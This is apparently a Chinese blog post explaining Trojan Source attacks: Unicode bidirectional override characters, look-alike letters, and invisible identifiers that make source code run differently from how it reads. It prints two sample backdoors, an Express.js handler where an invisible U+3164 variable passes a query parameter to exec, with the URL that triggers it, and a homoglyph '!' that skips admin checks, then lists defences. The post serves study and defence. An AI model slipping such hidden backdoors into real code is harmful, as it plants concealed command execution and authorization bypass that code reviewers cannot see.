2022年1月10日01:57:19评论92 views字数 4029阅读13分25秒阅读模式

近期国外发布了一篇关于unicode Bidirectional text（双向文本）的安全研究，终于抽时间看完了，发现还是很有趣的，抽时间总结一下。

0x00 双向文本

首先来简单介绍一下什么是双向文本(Bidirectional tex)，双向文本就是一个字符串里面，包含了两种文字，既包含从左到右的文字，又包含从右向左的文字。
我们最熟悉的中文是从左向右的书写方式，还有少数文字是从右向左的书写方式。特别是网站国际化的场景下比较常见。
下面这个表格是论文中提到的unicode排序相关的字符

类型	缩写	unicode编码	名称	描述
显示方向嵌入	LRE	U+202A	LEFT-TO-RIGHT EMBEDDING	将以下文本作为嵌入式left-to-right
显示方向嵌入	RLE	U+202B	RIGHT-TO-LEFT EMBEDDING	将以下文本作为嵌入式right-to-left
显示方向重写	LRO	U+202D	LEFT-TO-RIGHT OVERRIDE	后面的字符被视为强left-to-right字符
显示方向重写	RLO	U+202E	RIGHT-TO-LEFT OVERRIDE	后面的字符被视为强right-to-left字符
显示方向隔断	LRI	U+2066	LEFT-TO-RIGHT ISOLATE	将下面的文本视为孤立的left-to-right
显示方向隔断	RLI	U+2067	RIGHT-TO-LEFT ISOLATE	将下面的文本视为孤立的right-to-left
显示方向隔断	FSI	U+2068	FIRST STRONG ISOLATE	将下面的文本视为孤立的，它的方向是是第一个强字符的方向，并且不是内部的一个嵌套隔断。
终止显示方向嵌入和重写	PDF	U+202C	POP DIRECTIONAL FORMATTING	终止最近的LRE，RLE，LRO或RLO
终止显式方向隔断	PDI	U+2069	PDI POP DIRECTIONAL ISOLATE	终止最近的LRI或RLI

文本中是
RLI a b c PDI
而显示实际是
c b a

文本中是
RLI LRI a b c PDI LRI d e f PDI PDI
而实际上显示的是
d e f a b c
文本实际内容和我们看到的不一样，如果文本中的代码可以被正确执行，而我们看到的又是另外的代码，那么必然存在安全风险。

0x01 trojan source

bidi的安全风险

论文的作者针对C、C#、C++、Go、Java、Javascript、Python和Rust 这8种语言进行了测试，相关代码在github上，下载地址在文末。
我们以python代码举例：
代码实际内容为
Trojan Source
但是通过编辑器打开，可能显示的如下内容

因为通过RLO、LRI和PDI改变了显示方向。
通过python3执行

代码显示的和我们最终的执行结果是不一致的。

github上面的显示是存在问题的，不过已经有了提示。点击链接可以看到具体的内容。
Trojan Source
我们来看一看常见IDC和编辑器的显示是不是有问题呢
pychram

vscode

sublime

cat

101 Editor

vim

more

那么其他的常用编辑器，像系统自带的、notepad++之类的呢？

这个场景相对来说很常见了，不过大多数都集中在web端，其实可以发散到很多场景下，例如绕过一些设备的检测，是有想象空间的。
我们来通过作者论文中的代码来举例。
Trojan Source
直观的从输出上我们是看不出任何区别的。
通过十六进制显示

可以看到区别了，显示的都是H，但是实际是不同的字符。
十六进制表示为0xd09d的字符，是unicode编码为U+041D的字符。其实还有很多类似的字符，我们来贴张图展示一下，相关字符都可以在这个网站查询到。

最后文章作者针对不同的操作系统上面的不同编辑器进行了一个统计

0x02 基于语言特性的安全风险

基于javascript语言特性使用不可见字符导致的安全风险

在上篇论文发表不久，有人发表了一篇因为Javascipt语言特型导致的安全风险。
原理是找到一个不可见的（即无法显示的）Unicode字符，并且该字符可用于JavaScript的标识符/变量名称。实际上，从ECMAScript 2015版本开始，所有具有Unicode属性ID_Start的Unicode字符都可用于标识符（具有属性ID_Continue的字符可用于首写字符之后），然后找一个合理的场景触发即可。
作者是以\u3164这个字符，来展示相关的安全风险。

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

直观的看源代码，是发现不了任何问题的。
其实是存在不可见字符，然后导致了命令执行。

const { timeout,\u3164} = req.query;

通过请求下面的url，可以导致命令执行（%E3%85%A4是\u3164的url编码，具体的如何转换可以参考这篇文章）

http://host:8080/network_health?%E3%85%A4=<any command>

我们对代码进行微调，来更好的展示，检测本地网络，同时打印传递的变量(因为字符是不可见的，所以cat也看不到)
Trojan Source
这是正常的功能

下面我们通过不可见字符触发命令执行

基于javascript语言特性使用同型字符导致的安全风险

const [ ENV_PROD, ENV_DEV ] = [ 'PRODUCTION', 'DEVELOPMENT'];
/* … */
const environment = 'PRODUCTION';
/* … */
function isUserAdmin(user) {
    if(environmentǃ=ENV_PROD){
        // bypass authZ checks in DEV
        return true;
    }

    /* … */
    return false;
}

直观的阅读代码，通过environment变量来判断是否为生产环境。
那么真的是这样吗？其实这里使用的“感叹号”，不是真的“感叹号”，是一个“ALVEOLAR CLICK”字符，所以这里的把ENV_PRO变量赋值给environmentǃ，是一个赋值语句，if的判断始终为true（其他语言这么写会提示语法错误）。
类似的字符还有很多，作者在文章结尾提供unicode官方发表的安全使用注意事项。

0x03 防御方案

文本统一编码。
对非常规的字符和不可见字符进行扫描和处理。
选一个靠谱的编辑器。

tips

ANSI转义序列，在terminal中也有很多有趣的点，有兴趣的可以去研究研究。
另外参考里面有一篇关于第三方源安全风险的讨论，我就不多写了。

最后

近些年供应链安全问题层出不穷，最新的研究成果对防御工作提出了更高的挑战，利用有限的资源，来防御无限的攻击，如何取的一个平衡，这是门艺术。

参考

文章官网
https://www.trojansource.codes/
论文
https://www.trojansource.codes/trojan-source.pdf
代码地址
https://github.com/nickboucher/trojan-source
github关于告警的提示
https://github.blog/changelog/2021-10-31-warning-about-bidirectional-unicode-text/
bidi算法
https://blog.csdn.net/minibeargui/article/details/24888797
http://www.unicode.org/reports/tr9/
utf8和unicode字符映射集
https://www.utf8-chartable.de/unicode-utf8-table.pl
javascript语言特性导致的安全风险
https://certitude.consulting/blog/en/invisible-backdoor/
ASCII、unicode和utf-8编码的介绍
https://www.ruanyifeng.com/blog/2007/10/ascii_unicode_and_utf-8.html
unicode官方提供的安全注意事项
https://unicode.org/reports/tr36/
常见的容易混淆的unicode
http://www.unicode.org/Public/security/latest/confusables.txt
供应链安全
https://dhiyaneshgeek.github.io/web/security/2021/09/04/dependency-confusion/

FROM:tttang . com

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Trojan Source

0x00 双向文本

0x01 trojan source

bidi的安全风险

同形字符

0x02 基于语言特性的安全风险

基于javascript语言特性使用不可见字符导致的安全风险

基于javascript语言特性使用同型字符导致的安全风险

0x03 防御方案

tips

最后

参考

Ret2gets 的原理与利用方法

AI+MCP+IDA自动逆向分析技术指南

记一次三角洲辅助的逆向

PE结构学习

Redroid 镜像编译及预埋 adb_key认证

五种 EXE 处理方式，突破静态查杀

Windows本地代码执行漏洞(CVE-2012-1876)x86/x64平台分析

arm中的多寄存器寻址和与堆栈寻址

【免杀思路】基于特征码免杀

木马基础伪装学习

发表评论

在线咨询

微信